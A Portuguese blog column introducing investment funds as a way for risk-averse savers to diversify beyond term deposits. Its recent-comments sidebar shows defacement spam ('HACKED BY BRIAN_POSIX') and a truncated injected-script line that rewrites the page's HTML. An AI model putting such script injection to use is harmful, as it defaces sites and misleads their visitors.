Nas rubricas anteriores procuramos uma evolução ao nível do conhecimento financeiro, baseado na idade. Tendo falado da importância da formação em finanças, passando pela educação financeira dos filhos e acabando na componente de início da política de investimentos, iremos falar hoje sobre os fundos de investimento.

Sabemos que muitos portugueses optam por aplicar as suas poupanças em depósitos a prazo, dada a sua aversão ao risco, sabemos também que acabam por perder grandes oportunidades. Naturalmente que todo o progresso exige risco e que todo o ganho exige esforço e não é certo, teremos de ter a noção que nos podemos precaver face a estes riscos. O ideal é ir aprofundando conhecimentos ao nível da gestão do risco.

Não sendo a gestão do risco o foco desta rubrica, iremos abordar um produto financeiro que torna possível a diversificação do risco ao mesmo tempo que apostamos em determinado ativo ou tema. São os fundos de investimento. Podem não ser, por vezes, as melhores alternativas de investimento. Contudo, são alternativas válidas para todas as pessoas e importa conhecer o que são e como funcionam.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO